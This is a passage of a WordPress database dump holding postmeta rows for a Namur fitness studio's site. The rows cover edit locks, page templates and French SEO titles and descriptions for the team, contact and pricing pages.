(998, 322, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471054:1\";}\";'),
(999, 322, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1000, 323, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1001, 323, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471102:1\";}\";'),
(1002, 323, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1003, 324, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1004, 324, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471160:1\";}\";'),
(1005, 324, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1006, 325, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1007, 325, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471233:1\";}\";'),
(1008, 325, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1009, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1010, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471270:1\";}\";'),
(1011, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1012, 326, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1013, 326, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373472630:1\";}\";'),
(1014, 326, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1015, 32, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1016, 32, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373472646:1\";}\";'),
(1017, 32, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1486, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771536:1\";}\";'),
(1484, 388, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1485, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1483, 388, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1042, 332, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1043, 332, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770086:1\";}\";'),
(1044, 332, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1045, 332, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1046, 332, '_su_description', 's:166:\"a:1:{i:0;s:147:\"Unique à Namur, une nouvelle façon de faire du fitness - notre approche unique fait intervenir le coaching nutritionnel et la gestion  du stress.\";}\";'),
(1047, 332, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1048, 333, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1049, 333, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770152:1\";}\";'),
(1050, 333, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1051, 333, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1052, 333, '_su_description', 's:166:\"a:1:{i:0;s:147:\"Unique à Namur, une nouvelle façon de faire du fitness - notre approche unique fait intervenir le coaching nutritionnel et la gestion  du stress.\";}\";'),
(1053, 333, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1055, 334, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770287:1\";}\";'),
(1056, 334, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1057, 334, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1058, 334, '_su_description', 's:246:\"a:1:{i:0;s:227:\"Unique à Namur, une nouvelle façon de faire du fitness. Venez découvrir notre salle de cross training où vous bénéficierez d’un encadrement professionnel et d’entrainements personnalisés pour atteindre vos objectifs.\";}\";'),
(1059, 334, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1061, 335, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770472:1\";}\";'),
(1062, 335, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1063, 5, '_su_title', 'Cross Training Center - Notre philosophie'),
(1064, 5, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress'),
(1065, 5, '_su_rich_snippet_type', 'none'),
(1066, 336, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1067, 336, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770624:1\";}\";'),
(1068, 336, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1069, 20, '_su_title', 'Cross Training Center - L\'équipe'),
(1070, 20, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.'),
(1071, 20, '_su_rich_snippet_type', 'none'),
(1072, 337, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1073, 337, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770677:1\";}\";'),
(1074, 337, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1075, 9, '_su_title', 'Cross Training Center - Contact'),
(1076, 9, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur'),
(1077, 9, '_su_rich_snippet_type', 'none'),
(1078, 339, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1079, 339, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1377247543:1\";}\";'),
(1080, 339, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1081, 339, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1082, 339, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1083, 339, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1335, 358, '_su_description', 's:198:\"a:1:{i:0;s:179:\"Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress\";}\";'),
(1332, 358, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585523:1\";}\";'),
(1333, 358, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1334, 358, '_su_title', 's:59:\"a:1:{i:0;s:41:\"Cross Training Center - Notre philosophie\";}\";'),
(1331, 358, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1482, 388, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383588274:1\";}\";'),
(1481, 388, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1480, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1479, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1559, 395, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1477, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1478, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383588244:1\";}\";'),
(1475, 385, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1474, 385, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1473, 385, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1471, 385, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587326:1\";}\";'),
(1472, 385, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1470, 385, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1469, 384, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1468, 384, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1467, 384, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587231:1\";}\";'),
(1465, 383, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1466, 384, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1464, 383, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1463, 383, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587176:1\";}\";'),
(1462, 383, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1461, 382, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1460, 382, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1459, 382, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1458, 382, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1457, 382, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587103:1\";}\";'),
(1456, 382, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1455, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1454, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1453, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1452, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1451, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587021:1\";}\";'),
(1449, 381, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1450, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1448, 381, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1447, 381, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586926:1\";}\";'),
(1446, 381, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1445, 380, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1444, 380, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1442, 380, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1443, 380, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586895:1\";}\";'),
(1441, 379, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1440, 379, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1439, 379, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586865:1\";}\";'),
(1438, 379, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1437, 378, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1435, 378, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586776:1\";}\";'),
(1436, 378, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1434, 378, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1138, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1139, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449302:2\";}\";'),
(1140, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1141, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1142, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449424:2\";}\";'),
(1143, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1144, 214, '_su_rich_snippet_type', 'none'),
(1145, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1146, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449424:2\";}\";'),
(1147, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1148, 218, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1149, 342, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1150, 342, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449484:2\";}\";'),
(1151, 342, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1152, 342, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1153, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1154, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449498:2\";}\";'),
(1155, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1156, 218, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1433, 377, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966329:1\";}\";'),
(1432, 377, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1431, 377, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1430, 376, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1428, 376, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449550:2\";}\";'),
(1429, 376, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1427, 376, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1426, 375, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1425, 375, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1423, 375, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1424, 375, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1422, 375, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586685:1\";}\";'),
(1421, 375, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1420, 374, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1419, 374, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1418, 374, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1417, 374, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1416, 374, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586651:1\";}\";'),
(1415, 374, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1414, 373, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1413, 373, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1412, 373, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1411, 373, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1408, 372, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1409, 373, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1410, 373, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586613:1\";}\";'),
(1407, 372, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1406, 372, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1403, 372, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1404, 372, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586052:1\";}\";'),
(1405, 372, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1401, 371, '_menu_item_url', ''),
(1400, 371, '_menu_item_xfn', ''),
(1399, 371, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1398, 371, '_menu_item_target', ''),
(1397, 371, '_menu_item_object', 'page'),
(1394, 371, '_menu_item_type', 'post_type'),
(1395, 371, '_menu_item_menu_item_parent', '0'),
(1396, 371, '_menu_item_object_id', '369'),
(1393, 369, '_su_rich_snippet_type', 'none'),
(1392, 370, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1391, 370, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585939:1\";}\";'),
(1389, 369, '_wp_page_template', 'default'),
(1390, 370, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1386, 368, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1387, 369, '_edit_last', '1'),
(1388, 369, '_edit_lock', '1429688328:1'),
(1385, 368, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1384, 368, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1382, 368, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585897:1\";}\";'),
(1383, 368, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1381, 368, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1380, 367, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1379, 367, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1377, 367, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1378, 367, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1376, 367, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585853:1\";}\";'),
(1217, 344, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1218, 344, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962232:1\";}\";'),
(1219, 344, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1220, 344, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1221, 344, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1222, 344, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1223, 345, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1224, 345, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962331:1\";}\";'),
(1225, 345, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1226, 345, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1227, 345, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1228, 345, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1375, 367, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1374, 366, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1373, 366, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1372, 366, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1235, 346, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1236, 346, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962409:1\";}\";'),
(1237, 346, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1238, 346, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1239, 346, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1240, 346, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1371, 366, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1370, 366, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585792:1\";}\";'),
(1369, 366, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1368, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1367, 365, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1247, 347, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1248, 347, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962872:1\";}\";'),
(1249, 347, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1250, 347, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1251, 347, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1252, 347, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1366, 365, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1365, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1364, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585741:1\";}\";'),
(1362, 363, '_su_rich_snippet_type', 'none'),
(1363, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1361, 364, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1259, 348, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1260, 348, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962951:1\";}\";'),
(1261, 348, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1262, 348, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1263, 348, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1264, 348, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1265, 349, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1266, 349, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963050:1\";}\";'),
(1267, 349, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1268, 349, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1269, 349, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1270, 349, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1271, 350, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1272, 350, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963070:1\";}\";'),
(1273, 350, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1274, 350, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1275, 350, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1276, 350, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1360, 364, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585667:1\";}\";'),
(1359, 364, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1357, 363, '_edit_lock', '1441213788:3'),
(1358, 363, '_wp_page_template', 'default'),
(1354, 362, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1355, 361, '_su_rich_snippet_type', 'none'),
(1356, 363, '_edit_last', '3'),
(1353, 362, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585631:1\";}\";'),
(1283, 351, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1284, 351, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963161:1\";}\";'),
(1285, 351, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1286, 351, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1287, 351, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1288, 351, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1352, 362, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1351, 361, '_wp_page_template', 'default'),
(1350, 361, '_edit_lock', '1391979177:1'),
(1349, 361, '_edit_last', '1'),
(1348, 360, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1347, 360, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1295, 352, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1296, 352, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963247:1\";}\";'),
(1297, 352, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1298, 352, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1299, 352, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1300, 352, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1301, 353, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1302, 353, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963268:1\";}\";'),
(1303, 353, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1304, 353, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1305, 353, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1306, 353, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1307, 354, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1308, 354, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963317:1\";}\";'),
